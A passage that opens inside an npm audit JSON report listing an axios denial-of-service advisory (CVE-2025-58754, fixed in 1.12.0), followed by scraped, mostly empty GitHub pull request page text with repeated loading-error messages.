decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.","reported_by":null,"title":"Axios is vulnerable to DoS attack through lack of data size check","metadata":null,"cves":["CVE-2025-58754"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":"<1.12.0","github_advisory_id":"GHSA-4hjh-wcwx-xvwj","recommendation":"Upgrade to version 1.12.0 or later","patched_versions":">=1.12.0","updated":"2025-09-15T14:19:46.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-770"],"url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"}},"muted":[],"metadata":{"vulnerabilities":{"info":0,"low":1,"moderate":0,"high":1,"critical":1},"dependencies":699,"devDependencies":0,"optionalDependencies":0,"totalDependencies":699}}

RET-5989 #2151

Are you sure you want to change the base?

RET-5989 #2151

Uh oh!

Conversation

Mike-Brain commented Sep 17, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

JIRA link

Change description

Uh oh!

hsjhita left a comment • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

cindychmcts Sep 24, 2025

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Mike-Brain commented Sep 17, 2025 •

edited

Loading

hsjhita left a comment •

edited

Loading